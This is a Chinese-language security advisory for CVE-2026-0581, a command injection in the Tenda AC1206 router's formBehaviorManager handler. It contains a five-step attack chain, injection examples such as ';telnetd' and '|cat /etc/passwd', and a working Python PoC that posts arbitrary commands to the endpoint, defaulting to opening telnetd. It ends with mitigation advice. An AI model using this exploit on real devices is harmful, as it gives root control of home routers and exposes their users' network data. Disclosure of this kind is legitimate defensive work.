CVE-2026-0581 Tenda AC1206路由器 formBehaviorManager命令注入漏洞

漏洞信息

漏洞编号

CVE-2026-0581

漏洞类型

命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Tenda AC1206

漏洞概述

CVE-2026-0581是影响Tenda AC1206路由器15.03.06.23固件版本的命令注入漏洞。该漏洞存在于设备的Web服务器组件httpd中，具体位于/goform/BehaviorManager接口的formBehaviorManager函数。攻击者可以通过构造恶意的HTTP请求，利用modulename、option、data或switch等参数注入任意系统命令。由于该漏洞可通过网络远程利用，且只需要低权限认证即可执行，因此具有较高的实际威胁性。Tenda AC1206是一款面向家庭和小型办公环境的双频千兆无线路由器，广泛应用于国内外市场。漏洞已于2026年1月5日公开披露，攻击代码已在互联网公开，攻击者可利用该漏洞完全控制受影响设备，执行任意系统命令，获取root权限，窃取网络数据或将其纳入僵尸网络。鉴于该漏洞的利用难度低且影响范围明确，建议受影响用户立即采取防护措施。

技术细节

该漏洞为典型的命令注入（Command Injection）漏洞，存在于Tenda AC1206路由器的Web管理界面处理流程中。漏洞函数formBehaviorManager在处理用户提交的参数时，未对modulename、option、data、switch等参数进行充分的输入验证和安全过滤，直接将用户可控的数据传递给系统命令执行函数。在路由器固件的httpd服务实现中，这些参数被拼接进shell命令字符串中执行，攻击者可以通过在参数值中插入分号、管道符、反引号等shell特殊字符，实现命令注入。攻击者首先需要获取设备的Web管理界面访问权限（默认情况下可通过局域网访问），然后构造包含恶意命令的HTTP POST请求到/goform/BehaviorManager端点。例如，通过在参数中注入如`;telnetd`或`|cat /etc/passwd`等命令，可实现开启后门服务或读取敏感系统文件。由于路由器通常以root权限运行Web服务，注入的命令将以root权限执行，攻击者可获得设备的完全控制权。

攻击链分析

STEP 1

步骤1

信息收集：识别目标Tenda AC1206路由器，获取其IP地址，并确认Web管理界面可访问（默认端口80）

STEP 2

步骤2

构造恶意请求：构造HTTP POST请求到/goform/BehaviorManager端点，在data参数中注入包含shell特殊字符的命令 payload

STEP 3

步骤3

发送漏洞利用请求：将构造的恶意请求发送给目标设备服务器，触发formBehaviorManager函数中的命令注入漏洞

STEP 4

步骤4

命令执行：注入的命令以root权限在路由器系统上执行，攻击者实现远程代码执行，可执行任意系统命令

STEP 5

步骤5

持久化控制：攻击者可部署后门、修改启动脚本或获取敏感信息（如WiFi密码、PPPoE账号等），建立持久化访问

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2026-0581 PoC - Tenda AC1206 Command Injection
Affected: Tenda AC1206 Firmware 15.03.06.23
Vulnerable Endpoint: /goform/BehaviorManager
Vulnerable Parameters: modulename, option, data, switch
"""

import requests
import sys
import argparse

def exploit(target_ip, command):
    """
    Exploit command injection in Tenda AC1206
    """
    url = f"http://{target_ip}/goform/BehaviorManager"
    
    # Payload construction - inject command via 'data' parameter
    # Using semicolon to chain commands
    payload = f";{command}"
    
    data = {
        'modulename': 'test',
        'option': 'test',
        'data': payload,
        'switch': 'test'
    }
    
    try:
        print(f"[*] Sending exploit to {target_ip}")
        print(f"[*] Command: {command}")
        
        response = requests.post(url, data=data, timeout=10)
        
        print(f"[+] Response Status: {response.status_code}")
        print(f"[+] Response Length: {len(response.text)}")
        
        return response.text
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None

def main():
    parser = argparse.ArgumentParser(description='CVE-2026-0581 Exploit')
    parser.add_argument('target', help='Target IP address')
    parser.add_argument('-c', '--command', default='telnetd', 
                        help='Command to execute (default: telnetd)')
    
    args = parser.parse_args()
    
    print("="*60)
    print("CVE-2026-0581 - Tenda AC1206 Command Injection")
    print("="*60)
    
    result = exploit(args.target, args.command)
    if result:
        print("\n[+] Exploit sent successfully")
        print(f"Response: {result[:200]}...")

if __name__ == '__main__':
    main()

影响范围

Tenda AC1206 15.03.06.23

防御指南

临时缓解措施

立即禁用路由器的远程管理功能（Web界面设置中关闭"远程管理"选项），限制只能通过本地局域网访问管理界面。同时在边界防火墙上阻断对路由器80端口的外部访问。对于无法立即升级固件的场景，可通过ACL规则限制可信IP访问管理接口，并持续监控设备异常行为。建议用户检查路由器是否已被入侵（查看是否有未知账户、异常进程或可疑的定时任务）。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-0581
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-0581
3 Details https://www.cvedetails.com/cve/CVE-2026-0581/
4 VulDB https://vuldb.com/cve/CVE-2026-0581
5 Link https://github.com/ccc-iotsec/cve-/blob/Tenda/Tenda%20AC1206%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
6 Link https://vuldb.com/?ctiid.339473
7 Link https://vuldb.com/?id.339473
8 Link https://vuldb.com/?submit.731193
9 Link https://www.tenda.com.cn/